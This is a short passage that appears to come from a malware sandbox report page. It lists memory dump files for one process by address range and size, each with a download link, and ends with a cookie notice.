    • memory/4648-10-0x00007FF9A1920000-0x00007FF9A23E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4648-11-0x0000015C18690000-0x0000015C186A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4648-12-0x0000015C18690000-0x0000015C186A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4648-13-0x0000015C18690000-0x0000015C186A0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4648-17-0x00007FF9A1920000-0x00007FF9A23E1000-memory.dmp

      Filesize

      10.8MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.